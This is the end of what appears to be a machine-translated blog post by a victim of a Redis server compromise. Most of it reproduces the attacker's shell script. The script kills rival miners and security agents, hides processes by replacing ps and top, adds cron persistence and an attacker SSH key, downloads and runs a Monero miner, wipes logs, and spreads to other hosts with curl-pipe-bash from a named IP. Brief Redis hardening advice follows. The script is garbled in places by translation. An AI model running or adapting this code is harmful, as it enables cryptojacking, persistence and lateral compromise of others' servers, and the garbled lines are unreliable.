/tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -rf /etc/systemd/system/systemde.service* rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so
chattr -i /etc/ld.so.preload
rm -f /etc/ld.so.preload
systemctl stop moneroocean_miner.service
systemctl stop systemde.service
rm -f /usr/local/lib/libioset.so rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm - RF /var/tmp/nadezhda.x86_64.1 RM -rf /var/tmp/nadezhda.x86_64.2 RM -rf /var/tmp/ SUSTSE3 RM - RF /var/tmp/ SUSTSE RM - RF /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib rm -rf /opt/systemd-service.sh rm -rf /opt/.systemd-service.sh rm -rf /root/.systemd-service.sh rm -rf /usr/share/\[crypto\] chattr -R -ia /usr/bin/TeamTNT/* chattr -R -ia /usr/bin/watchdogd* rm -rf /usr/bin/watchdogd* service crypto stop systemctl stop crypto.service systemctl stop watchdogd service watchdogd stop rm -fr /usr/bin/TeamTNT/* chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsiecho 1 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
sleep 1
chattr -i /usr/lib/systemd/systemd-update-daily
echo1 > /usr/lib/systemd/systemd-update-daily chattr +i /usr/lib/systemd/systemd-update-daily >/tmp/svcupdate >/tmp/svcguard >/etc/svcupdate >/etc/svcguard >/etc/cron.daily/logrotate >/etc/cron.hourly/0anacron >/etc/rc.d/rc.local#yum install -y docker.io || apt-get install docker.io;
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab } kill_miner_prockill_sus_proc()
{
ps axf -o "pid"|while read procid
do
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
cat /proc/$procid/cmdline| grep -a -E "zzh"
if [ $? -ne 0 ]
then
kill9 -$procid
else
echo "don't kill"
fi
fi
done
ps axf -o "pid %cpu" | awk '{the if ($2 > = 40.0) print $1}' | while read procid
do
cat /proc/$procid/cmdline| grep -a -E "zzh"
if [ $? -ne 0 ]
then
kill9 -$procid
else
echo "don't kill"
fi
done
}
kill_sus_proc
nameserver1.1.1.1 () {grep - q/etc/resolv. Conf | | chattr - I/etc/resolv. Conf 1 > 2 > / dev/null/dev/null.echo "nameserver 1.1.1.1" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null
}
nameserver
fuckyou(){
$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/ usr/bin/supervisor..." | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/ app/BitLockerServi..." | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrigfile="/root/.tmp/miner.sh"
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile2>/dev/null 1>/dev/null chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null ps ax| grep xmrig 2>/dev/null 1>/dev/nullfi
KINSING1=$(ps ax | grep -v grep | grep "/var/tmp/kinsing")
if [ ! -z "$KINSING1" ];
then
chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null
pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null
echo "" > /var/tmp/kinsing 2>/dev/null 1>/dev/null
rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
echo "fuckyou" > /var/tmp/kinsing
chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
KINSING2=$(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi")
if [ ! -z "$KINSING2" ];
then
chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null
echo "" > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
echo "fuckyou" > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
}
fuckyou
downloads()
{
if [ -f "/usr/bin/curl" ]
then
echo The $1.$2
http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} The $1`
if [ "$http_code" -eq "200" ]
then
curl --connect-timeout 100 --retry 100 The $1 > $2
elif [ "$http_code" -eq "405" ]
then
curl --connect-timeout 100 --retry 100 The $1 > $2
else
curl --connect-timeout 100 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/cd1" ]
then
http_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} The $1`
if [ "$http_code" -eq "200" ]
then
cd1 --connect-timeout 100 --retry 100 The $1 > $2
elif [ "$http_code" -eq "405" ]
then
cd1 --connect-timeout 100 --retry 100 The $1 > $2
else
cd1 --connect-timeout 100 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/wget" ]
then
wget --timeout=50 --tries=100 -O $2 The $1
if [ $? -ne 0 ]
then
wget --timeout=100 --tries=100 -O $2 $3
fi
elif [ -f "/usr/bin/wd1" ]
then
wd1 --timeout=100 --tries=100 -O $2 The $1
if [ $? -eq 0 ]
then
wd1 --timeout=100 --tries=100 -O $2 $3
fi
fi
}
unlock_cron()
{
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /var/spool/cron/crontabs
chattr -R -ia /etc/cron.d
}
lock_cron()
{
chattr -R +ia /var/spool/cron
chattr +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
}
if [ -f "$rtdir" ]
then
echo "i am root"
mkdir -p /root/.ssh
echo "goto 1" >> /etc/zzhs
chattr -ia /etc/zzh*
chattr -ia /etc/newinit.sh*
chattr -ia /root/.ssh/authorized_keys*
chattr -R -ia /root/.ssh
if [ -f "/bin/ps.original" ]
then
echo "/bin/ps changed"
else
mv /bin/ps /bin/ps.original
echo "#! /bin/bash">>/bin/ps
echo "ps.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/ps
chmod +x /bin/ps
touch -d 20160825 /bin/ps
echo "/bin/ps changing"
fi
if [ -f "/bin/top.original" ]
then
echo "/bin/top changed"
else
mv /bin/top /bin/top.original
echo "#! /bin/bash">>/bin/top
echo "top.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/top
chmod +x /bin/top
touch -d 20160825 /bin/top
echo "/bin/top changing"
fi
if [ -f "/bin/pstree.original" ]
then
echo "/bin/pstree changed"
else
mv /bin/pstree /bin/pstree.original
echo "#! /bin/bash">>/bin/pstree
echo "pstree.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pstree
chmod +x /bin/pstree
touch -d 20160825 /bin/pstree
echo "/bin/pstree changing"
fi
if [ -f "/bin/chattr" ]
then
chattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`
if [ "$chattrsize" -lt "$chattr_size" ]
then
yum -y remove e2fsprogs
yum -y install e2fsprogs
else
echo "no need install chattr"
fi
else
yum -y remove e2fsprogs
yum -y install e2fsprogs
fi
unlock_cron
rm -f ${crondir}
rm -f /etc/cron.d/zzh
rm -f /etc/crontab
echo "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}
echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzh
echo "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontab
echo crontab created
lock_cron
chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOu yjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqV v+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1z phe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J86 5AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0= uc1"> / root /. SSH/authorized_keys which cd1 wget - q - O - http://195.242.111.238/cleanfda/call.txt The file = http://195.242.111.238/cleanfda/call.txt"/etc/zzh"
if [ -f "/etc/zzh" ]
then
filesize1=`ls -l /etc/zzh | awk '{ print $5 }'`
if [ "$filesize1" -ne "$miner_size" ]
then
pkill -f zzh
rm /etc/zzh
downloads $miner_url /etc/zzh $miner_url_backup
else
echo "not need download"
fi
else
downloads $miner_url /etc/zzh $miner_url_backup
fi
downloads $sh_url /etc/newinit.sh $sh_url_backup
chmod 777 /etc/zzh
if [ -f "/bin/ps.original" ]
then
ps.original -fe|grep zzh |grep -v grep
else
ps -fe|grep zzh |grep -v grep
fi
if [ $? -ne 0 ]
then
cd /etc
echo "not root runing"sleep 5s ./zzh --log-file=/etc/etc --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash -- Coin Monero-O 80.211.206.105:9000-U 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background &else
echo "root runing....."
fi
chmod 777 /etc/zzh
chattr +ia /etc/zzh
chmod 777 /etc/newinit.sh
chattr +ia /etc/newinit.sh
chmod 600 /root/.ssh/authorized_keys
chattr +ia /root/.ssh/authorized_keys
else
echo "goto 1" > /tmp/zzhs
chattr -ia /tmp/zzh*
chattr -ia /tmp/newinit.sh*
if [ ! -f "/usr/bin/crontab" ]
then
unlock_cron
echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir}
lock_cron
else
unlock_cron
[[ $cont= ~"newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab -
lock_cron
fi
if [ -f "/tmp/zzh" ]
then
filesize1=`ls -l /tmp/zzh | awk '{ print $5 }'`
if [ "$filesize1" -ne "$miner_size" ]
then
pkill -f zzh
rm /tmp/zzh
downloads $miner_url /tmp/zzh $miner_url_backup
else
echo "no need download"
fi
else
downloads $miner_url /tmp/zzh $miner_url_backup
fi
echo "i am here"
downloads $sh_url /tmp/newinit.sh $sh_url_backup
ps -fe|grep zzh |grep -v grep
if [ $? -ne 0 ]
then
echo "not tmp runing"
cd/tmp chmod 777 zzh sleep 5s ./zzh --log-file=/tmp/tmp --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 -- TLS -- niceHash -- Coin Monero -o 80.211.206.105:9000-U 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background &else
echo "tmp runing....."
fi
chmod 777 /tmp/zzh
chattr +i /tmp/zzh
chmod 777 /tmp/newinit.sh
chattr +i /tmp/newinit.sh
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 10008 -j DROP
service iptables reload
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
chmod 444 /usr/bin/chattr
chmod 444 /bin/chattr
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\ b ([0-9] {1, 3} \.) {3} [0-9] {1, 3} \ b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl - o - http://195.242.111.238/cleanfda/init.sh | bash > / dev/null 2 > &1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\ b ([0-9] {1, 3} \.) {3} [0-9] {1, 3} \ b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'which cd1 -o - http://195.242.111.238/cleanfda/init.sh | bash > / dev/null 2 > &1 &' & done
fi
echo "$bbdir"
echo "$bbdira"
$bbdir- fsSL http://195.242.111.238/cleanfda/is.sh | bash$bbdira- fsSL http://195.242.111.238/cleanfda/is.sh | bashCopy the codePrevent problems from recurring
Redis sets the password
Editing a Configuration File
vi /opt/myredis/redis.conf
Copy the codeSet the password as follows:
requirepass heikeshizhenqian
Copy the codeThe redis log file is configured
Editing a Configuration File
vi /opt/myredis/redis.conf
Copy the codeConfigure log location:
logfile "/opt/myredis/logs/redis.log"
Copy the codeStart the redis:
redis-server /opt/myredis/redis.conf
Copy the codeSecurity groups are open to specified IP addresses
Don’t configure 0.0.0.0/0 for the security group. If you can determine the inbound IP address, configure it with the outbound IP address. You don’t give them a chance.
As for the risk of this problem is temporarily solved, I finally decided to restore my server again, because some configurations of the vulnerability attack, temporary files are still left on the server.
Finally, the redis of the public network must set a good password, and it is a complex password.